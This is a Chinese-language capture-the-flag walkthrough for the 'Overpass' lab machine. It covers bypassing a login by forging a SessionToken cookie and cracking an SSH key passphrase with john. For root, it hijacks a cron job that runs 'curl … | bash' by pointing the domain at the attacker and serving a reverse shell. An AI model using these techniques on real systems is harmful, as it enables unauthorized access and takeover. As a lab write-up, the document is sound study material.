Overpass

当一群计算机科学专业的学生试图创建一个密码管理器时会发生什么?

---

Nmap起手，先扫一波开放端口。得到22，80端口开放

访问80端口，是一个Overpass的网站页面

dirb一下目录，有个admin的目录

访问是一个登录的页面，感觉切入点应该在这，尝试了注入，登录绕过，弱口令均没有成功。

查看页面源代码时发先包含一个login.js的文件

如果页面没有Incorrect credentials时会把Cookie设置成SessionToken

 

尝试把Cookie的值改成SessionToken，值默认的 作用域改成/

改成这样

刷新页面，就进来了，页面里是一个ssh的私钥

这个应该是james用户的私钥

把私钥复制出来用john**出密码

 

获取私钥的hash要用到ssh2john

git clone https://github.com/magnumripper/JohnTheRipper

克隆下来后用ssh2john 把hash重定向出来

看下重定向出来的hash

用john加载rockyou**hash

得到密码james13

把记得id_rsa的权限设置成600才能用私钥登录

输入刚刚得到的密码

进来就能拿到user.txt flag 里面还有一个todo.txt的文件

提示有个构造的脚本

看下定时任务，里面有个curl overpass.thm/downloads/src/buildsript.sh | bash

请求overpass.thm网站的buoldscript.sh 并执行

那可以修改Hosts文件把overpass.thm的域名指向到我们的攻击机上。

再用python搭建构造这样一个目录结构的网站把shell弹回来

先把目录给创建好 mkdir downloads/src/

在把创建好的文件放进去，里面是个反弹shell

这边python网站很快就有反应

另外nc也要起个监听

nc起监听等待一会，马上shell 就回来了。直接查看root.txt